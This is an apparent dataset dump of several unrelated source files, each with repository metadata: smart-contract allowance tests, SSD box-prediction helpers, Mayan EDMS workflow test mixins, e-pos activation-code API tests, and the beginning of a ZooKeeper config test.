assert rewards_only_gauge.allowance(accounts[0], accounts[1]) == 12345678
def test_revoke_approve(rewards_only_gauge, accounts):
rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
rewards_only_gauge.approve(accounts[1], 0, {"from": accounts[0]})
assert rewards_only_gauge.allowance(accounts[0], accounts[1]) == 0
def test_approve_self(rewards_only_gauge, accounts):
rewards_only_gauge.approve(accounts[0], 10 ** 19, {"from": accounts[0]})
assert rewards_only_gauge.allowance(accounts[0], accounts[0]) == 10 ** 19
def test_only_affects_target(rewards_only_gauge, accounts):
rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
assert rewards_only_gauge.allowance(accounts[1], accounts[0]) == 0
def test_returns_true(rewards_only_gauge, accounts):
tx = rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
assert tx.return_value is True
def test_approval_event_fires(accounts, rewards_only_gauge):
tx = rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
assert len(tx.events) == 1
assert tx.events["Approval"].values() == [accounts[0], accounts[1], 10 ** 19]
def test_increase_allowance(accounts, rewards_only_gauge):
rewards_only_gauge.approve(accounts[1], 100, {"from": accounts[0]})
rewards_only_gauge.increaseAllowance(accounts[1], 403, {"from": accounts[0]})
assert rewards_only_gauge.allowance(accounts[0], accounts[1]) == 503
def test_decrease_allowance(accounts, rewards_only_gauge):
rewards_only_gauge.approve(accounts[1], 100, {"from": accounts[0]})
rewards_only_gauge.decreaseAllowance(accounts[1], 34, {"from": accounts[0]})
assert rewards_only_gauge.allowance(accounts[0], accounts[1]) == 66
| 36.409091
| 81
| 0.729921
| 335
| 2,403
| 4.979104
| 0.149254
| 0.204436
| 0.297362
| 0.151679
| 0.736811
| 0.736811
| 0.736811
| 0.736811
| 0.684053
| 0.651079
| 0
| 0.057265
| 0.120682
| 2,403
| 65
| 82
| 36.969231
| 0.732134
| 0
| 0
| 0.222222
| 0
| 0
| 0.026217
| 0
| 0
| 0
| 0
| 0
| 0.305556
| 1
| 0.277778
| false
| 0
| 0.027778
| 0
| 0.305556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a2edea30c0c984fb98ee3f06934a11216aa7c92b
| 1,612
|
py
|
Python
|
source/02_ssd_large/lib/predict.py
|
toshi-k/kaggle-3d-object-detection-for-autonomous-vehicles
|
af2e0db16281fb997a9bd5149c478095128a627e
|
[
"MIT"
] | 24
|
2019-11-28T05:54:58.000Z
|
2021-06-14T07:38:30.000Z
|
source/03_ssd_small/lib/predict.py
|
toshi-k/kaggle-3d-object-detection-for-autonomous-vehicles
|
af2e0db16281fb997a9bd5149c478095128a627e
|
[
"MIT"
] | null | null | null |
source/03_ssd_small/lib/predict.py
|
toshi-k/kaggle-3d-object-detection-for-autonomous-vehicles
|
af2e0db16281fb997a9bd5149c478095128a627e
|
[
"MIT"
] | 5
|
2019-12-06T05:59:32.000Z
|
2021-09-16T13:30:29.000Z
|
def predict_boxes(input_tensor, i, x, y, b=0):
assignment = input_tensor[b, 17 * i: 17 * i + 10, x, y]
predict_x = input_tensor[b, 17 * i + 10, x, y]
predict_y = input_tensor[b, 17 * i + 11, x, y]
predict_length = input_tensor[b, 17 * i + 12, x, y]
predict_width = input_tensor[b, 17 * i + 13, x, y]
predict_rotate = input_tensor[b, 17 * i + 16, x, y]
return assignment, predict_x, predict_y, predict_length, predict_width, predict_rotate
def predict_boxes_numpy(input_tensor, i, x, y):
assignment = input_tensor[17 * i: 17 * i + 10, x, y]
predict_x = input_tensor[17 * i + 10, x, y]
predict_y = input_tensor[17 * i + 11, x, y]
predict_length = input_tensor[17 * i + 12, x, y]
predict_width = input_tensor[17 * i + 13, x, y]
predict_rotate = input_tensor[17 * i + 16, x, y]
return assignment, predict_x, predict_y, predict_length, predict_width, predict_rotate
def predict_boxes_numpy_3d(input_tensor, i, x, y):
assignment = input_tensor[17 * i: 17 * i + 10, x, y]
predict_x = input_tensor[17 * i + 10, x, y]
predict_y = input_tensor[17 * i + 11, x, y]
predict_length = input_tensor[17 * i + 12, x, y]
predict_width = input_tensor[17 * i + 13, x, y]
predict_z = input_tensor[17 * i + 14, x, y]
predict_height = input_tensor[17 * i + 15, x, y]
predict_rotate = input_tensor[17 * i + 16, x, y]
return assignment, predict_x, predict_y, predict_length, predict_width, predict_rotate, predict_z, predict_height
def predict_assignment(input_tensor, i, x, y):
return input_tensor[17 * i: 17 * i + 10, x, y]
| 35.822222
| 117
| 0.649504
| 276
| 1,612
| 3.554348
| 0.097826
| 0.280326
| 0.155963
| 0.214067
| 0.873598
| 0.827727
| 0.827727
| 0.827727
| 0.827727
| 0.686035
| 0
| 0.0752
| 0.224566
| 1,612
| 44
| 118
| 36.636364
| 0.7096
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0.035714
| 0.285714
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0c02bf843c0549e3e5cc24fb817c8a796dcedd7f
| 16,898
|
py
|
Python
|
mayan/apps/document_states/tests/mixins/workflow_template_transition_mixins.py
|
bonitobonita24/Mayan-EDMS
|
7845fe0e1e83c81f5d227a16116397a3d3883b85
|
[
"Apache-2.0"
] | 343
|
2015-01-05T14:19:35.000Z
|
2018-12-10T19:07:48.000Z
|
mayan/apps/document_states/tests/mixins/workflow_template_transition_mixins.py
|
bonitobonita24/Mayan-EDMS
|
7845fe0e1e83c81f5d227a16116397a3d3883b85
|
[
"Apache-2.0"
] | 191
|
2015-01-03T00:48:19.000Z
|
2018-11-30T09:10:25.000Z
|
mayan/apps/document_states/tests/mixins/workflow_template_transition_mixins.py
|
bonitobonita24/Mayan-EDMS
|
7845fe0e1e83c81f5d227a16116397a3d3883b85
|
[
"Apache-2.0"
] | 114
|
2015-01-08T20:21:05.000Z
|
2018-12-10T19:07:53.000Z
|
from django.db.models import Q
from mayan.apps.events.classes import EventType
from ...models import (
WorkflowTransition, WorkflowTransitionField,
WorkflowTransitionTriggerEvent
)
from ..literals import (
TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_HELP_TEXT,
TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL,
TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL_EDITED,
TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_NAME,
TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_TYPE,
TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL,
TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL_EDITED
)
class WorkflowTransitionFieldViewTestMixin:
def _request_workflow_template_transition_field_create_view(self):
pk_list = list(
WorkflowTransitionField.objects.values_list('pk', flat=True)
)
response = self.post(
viewname='document_states:workflow_template_transition_field_create',
kwargs={
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}, data={
'field_type': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_TYPE,
'name': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_NAME,
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL,
'help_text': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_HELP_TEXT
}
)
try:
self._test_workflow_template_transition_field = WorkflowTransitionField.objects.get(
~Q(pk__in=pk_list)
)
except WorkflowTransitionField.DoesNotExist:
self._test_workflow_template_transition_field = None
return response
def _request_workflow_template_transition_field_delete_view(self):
return self.post(
viewname='document_states:workflow_template_transition_field_delete',
kwargs={
'workflow_template_transition_field_id': self._test_workflow_template_transition_field.pk
}
)
def _request_workflow_template_transition_field_edit_view(self):
return self.post(
viewname='document_states:workflow_template_transition_field_edit',
kwargs={
'workflow_template_transition_field_id': self._test_workflow_template_transition_field.pk
}, data={
'field_type': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_TYPE,
'name': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_NAME,
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL_EDITED,
'help_text': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_HELP_TEXT
}
)
def _request_test_workflow_template_transition_field_list_view(self):
return self.get(
viewname='document_states:workflow_template_transition_field_list',
kwargs={
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
class WorkflowTemplateTransitionAPIViewTestMixin:
def _request_test_workflow_template_transition_create_api_view(
self, extra_data=None
):
data = {
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL,
'origin_state_id': self._test_workflow_template_states[0].pk,
'destination_state_id': self._test_workflow_template_states[1].pk
}
if extra_data:
data.update(extra_data)
pk_list = list(
WorkflowTransition.objects.values_list('pk', flat=True)
)
response = self.post(
viewname='rest_api:workflow-template-transition-list', kwargs={
'workflow_template_id': self._test_workflow_template.pk
}, data=data
)
try:
self._test_workflow_template_transition = WorkflowTransition.objects.get(
~Q(pk__in=pk_list)
)
except WorkflowTransition.DoesNotExist:
self._test_workflow_template_transition = None
return response
def _request_test_workflow_template_transition_delete_api_view(self):
return self.delete(
viewname='rest_api:workflow-template-transition-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
def _request_test_workflow_template_transition_detail_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
def _request_test_workflow_template_transition_list_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk
}
)
def _request_test_workflow_template_transition_edit_patch_api_view(self):
return self.patch(
viewname='rest_api:workflow-template-transition-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}, data={
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL_EDITED,
'origin_state_id': self._test_workflow_template_states[1].pk,
'destination_state_id': self._test_workflow_template_states[0].pk
}
)
def _request_test_workflow_template_transition_edit_put_api_view_via(self):
return self.put(
viewname='rest_api:workflow-template-transition-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}, data={
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL_EDITED,
'origin_state_id': self._test_workflow_template_states[1].pk,
'destination_state_id': self._test_workflow_template_states[0].pk
}
)
class WorkflowTransitionFieldAPIViewTestMixin:
def _request_test_workflow_template_transition_field_create_api_view(self):
pk_list = list(WorkflowTransitionField.objects.values_list('pk'))
response = self.post(
viewname='rest_api:workflow-template-transition-field-list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
}, data={
'field_type': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_TYPE,
'name': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_NAME,
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL,
'help_text': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_HELP_TEXT
}
)
try:
self._test_workflow_template_transition_field = WorkflowTransitionField.objects.get(
~Q(pk__in=pk_list)
)
except WorkflowTransitionField.DoesNotExist:
self._test_workflow_template_transition_field = None
return response
def _request_test_workflow_template_transition_field_delete_api_view(self):
return self.delete(
viewname='rest_api:workflow-template-transition-field-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_field_id': self._test_workflow_template_transition_field.pk
}
)
def _request_test_workflow_template_transition_field_detail_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-field-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_field_id': self._test_workflow_template_transition_field.pk
}
)
def _request_test_workflow_template_transition_field_edit_via_patch_api_view(self):
return self.patch(
viewname='rest_api:workflow-template-transition-field-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_field_id': self._test_workflow_template_transition_field.pk
}, data={
'label': '{} edited'.format(
self._test_workflow_template_transition_field
)
}
)
def _request_test_workflow_template_transition_field_list_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-field-list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
class WorkflowTransitionFieldTestMixin:
def _create_test_workflow_template_transition_field(self, extra_data=None):
kwargs = {
'field_type': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_TYPE,
'name': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_NAME,
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL,
'help_text': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_HELP_TEXT
}
kwargs.update(extra_data or {})
self._test_workflow_template_transition_field = self._test_workflow_template_transition.fields.create(
**kwargs
)
class WorkflowTemplateTransitionTriggerAPIViewTestMixin:
def _request_test_workflow_template_transition_trigger_create_api_view(self):
data = {
'event_type_id': self._test_event_type.id
}
pk_list = list(
WorkflowTransitionTriggerEvent.objects.values_list(
'pk', flat=True
)
)
response = self.post(
viewname='rest_api:workflow-template-transition-trigger-list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}, data=data
)
try:
self._test_workflow_template_transition_trigger = WorkflowTransitionTriggerEvent.objects.get(
~Q(pk__in=pk_list)
)
except WorkflowTransitionTriggerEvent.DoesNotExist:
self._test_workflow_template_transition_trigger = None
return response
def _request_test_workflow_template_transition_trigger_delete_api_view(self):
return self.delete(
viewname='rest_api:workflow-template-transition-trigger-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_trigger_id': self._test_workflow_template_transition_trigger.pk
}
)
def _request_test_workflow_template_transition_trigger_detail_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-trigger-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_trigger_id': self._test_workflow_template_transition_trigger.pk
}
)
def _request_test_workflow_template_transition_trigger_list_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-trigger-list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
def _request_test_workflow_template_transition_trigger_edit_patch_api_view(self):
return self.patch(
viewname='rest_api:workflow-template-transition-trigger-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_trigger_id': self._test_workflow_template_transition_trigger.pk
}, data={
'event_type_id': self._test_event_type.id
}
)
def _request_test_workflow_template_transition_trigger_edit_put_api_view(self):
return self.put(
viewname='rest_api:workflow-template-transition-trigger-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_trigger_id': self._test_workflow_template_transition_trigger.pk
}, data={
'event_type_id': self._test_event_type.id
}
)
class WorkflowTemplateTransitionTriggerTestMixin:
def setUp(self):
super().setUp()
self._test_workflow_template_transition_triggers = []
def _create_test_workflow_template_transition_trigger(self):
event_type = EventType.get(id=self._test_event_type.id)
self._test_workflow_template_transition_trigger = self._test_workflow_template_transition.trigger_events.create(
event_type=event_type.get_stored_event_type()
)
self._test_workflow_template_transition_triggers.append(
self._test_workflow_template_transition_trigger
)
class WorkflowTemplateTransitionTriggerViewTestMixin:
def _request_test_workflow_template_transition_event_list_view(self):
return self.get(
viewname='document_states:workflow_template_transition_triggers',
kwargs={
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
class WorkflowTemplateTransitionViewTestMixin:
def _request_test_workflow_template_transition_create_view(self):
pk_list = list(
WorkflowTransition.objects.values_list('pk', flat=True)
)
response = self.post(
viewname='document_states:workflow_template_transition_create',
kwargs={
'workflow_template_id': self._test_workflow_template.pk
}, data={
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL,
'origin_state': self._test_workflow_template_states[0].pk,
'destination_state': self._test_workflow_template_states[1].pk
}
)
try:
self._test_workflow_template_transition = WorkflowTransition.objects.get(
~Q(pk__in=pk_list)
)
except WorkflowTransition.DoesNotExist:
self._test_workflow_template_transition = None
return response
def _request_test_workflow_template_transition_delete_view(self):
return self.post(
viewname='document_states:workflow_template_transition_delete',
kwargs={
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
def _request_test_workflow_template_transition_edit_view(self):
return self.post(
viewname='document_states:workflow_template_transition_edit',
kwargs={
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}, data={
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL_EDITED,
'origin_state': self._test_workflow_template_states[0].pk,
'destination_state': self._test_workflow_template_states[1].pk
}
)
def _request_test_workflow_template_transition_list_view(self):
return self.get(
viewname='document_states:workflow_template_transition_list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk
}
)
| 41.214634
| 120
| 0.676471
| 1,700
| 16,898
| 6.164706
| 0.051176
| 0.314504
| 0.391985
| 0.28626
| 0.913454
| 0.906489
| 0.840649
| 0.806011
| 0.771183
| 0.731107
| 0
| 0.000795
| 0.255533
| 16,898
| 409
| 121
| 41.315403
| 0.832273
| 0
| 0
| 0.553009
| 0
| 0
| 0.17724
| 0.13327
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083095
| false
| 0
| 0.011461
| 0.060172
| 0.191977
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0c1bd497d7db16c0709031813426d095d2572a32
| 10,347
|
py
|
Python
|
case/Test_Environment/E_pos/E_pos_clientManager_createActivationCode.py
|
Four-sun/Requests_Load
|
472f3f6d9bd407f1c4ed30a5557ec141e2434188
|
[
"Apache-2.0"
] | null | null | null |
case/Test_Environment/E_pos/E_pos_clientManager_createActivationCode.py
|
Four-sun/Requests_Load
|
472f3f6d9bd407f1c4ed30a5557ec141e2434188
|
[
"Apache-2.0"
] | null | null | null |
case/Test_Environment/E_pos/E_pos_clientManager_createActivationCode.py
|
Four-sun/Requests_Load
|
472f3f6d9bd407f1c4ed30a5557ec141e2434188
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created: on 2018-04-19
@author: Four
Project: case\E-pos_clientManager_createActivationCode.py
URL: http://epos-pc-qa.eslink.net.cn/clientManager/createActivationCode
"""
import unittest
import os
import time
import sys
import requests
from case.Test_Environment.E_pos.Login_ecc import Login_ecc
from common.Request_Package import send_requests
from common.Excel_readline import ExcelUtil
from common.log import Logger
# 获取xlsx路径
path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
testxlsx = os.path.join(path, "config")
reportxlsx = os.path.join(testxlsx, "Epos-eccManager-testcase.xlsx")
Sheet_Name = "clientManager_createActivation"
logger_message = Logger()
send_time = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime(time.time()))
class clientManager_createActivationC(unittest.TestCase):
def test_SearchActionCode_1(self):
u"""正确的条件,成功创建一个激活码"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 0
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_2(self):
u"""创建激活码:没有条件调用接口"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 1
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_3(self):
u"""创建激活码:必输项检查:merchantCode"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 2
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_4(self):
u"""创建激活码:非必输项检查:ownerShip"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 3
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_5(self):
u"""创建激活码:必输项检查:creatNum"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 4
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_6(self):
u"""创建激活码:输入项float字段类型校验:merchantCode"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 5
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_7(self):
u"""创建激活码:输入项int字段类型校验:creatNum"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 6
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_8(self):
u"""创建激活码输入项float字段类型校验:ownerShip"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 7
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_9(self):
u"""创建激活码:输入项float字段类型校验:subMerchantCode"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 8
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_10(self):
u"""创建激活码:输入项字段的特定类型校验:merchantCode"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 9
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_11(self):
u"""创建激活码:输入项字段的特定类型校验:subMerchantCode"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 10
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_12(self):
u"""创建激活码:输入项字段的特定类型校验:creatNum"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 11
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_13(self):
u"""创建激活码:输入项字段的特定类型校验:ownerShip"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 12
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_14(self):
u"""创建激活码:creatNum创建个数边界值:0"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 13
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_15(self):
u"""创建激活码:creatNum创建个数边界值:51"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 14
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_16(self):
u"""创建激活码:特殊字符的校验"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 15
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
if __name__ == '__main__':
unittest.main()
| 38.180812
| 110
| 0.623659
| 1,246
| 10,347
| 4.938202
| 0.105939
| 0.062409
| 0.059808
| 0.067609
| 0.830814
| 0.830814
| 0.830814
| 0.830814
| 0.830814
| 0.830814
| 0
| 0.007473
| 0.262878
| 10,347
| 270
| 111
| 38.322222
| 0.799266
| 0.059341
| 0
| 0.707965
| 0
| 0
| 0.040854
| 0.006118
| 0
| 0
| 0
| 0
| 0.070796
| 1
| 0.070796
| false
| 0
| 0.039823
| 0
| 0.115044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0c43d917fdf8ed40a2ce8ae986d5de6c80f8ba5f
| 5,231
|
py
|
Python
|
zkutil/test/test_zkconf.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
zkutil/test/test_zkconf.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
zkutil/test/test_zkconf.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
import unittest
from pykit import config
from pykit import ututil
from pykit import zkutil
dd = ututil.dd
class TestZKConf(unittest.TestCase):
def test_specified(self):
c = zkutil.ZKConf(
hosts='hosts',
tx_dir='tx_dir/',
record_dir='record_dir/',
seq_dir='seq_dir/',
lock_dir='lock_dir/',
node_id='node_id',
auth=('digest', 'a', 'b'),
acl=(('foo', 'bar', 'cd'), ('xp', '123', 'cdrwa'))
)
self.assertEqual('hosts', c.hosts())
self.assertEqual('tx_dir/', c.tx_dir())
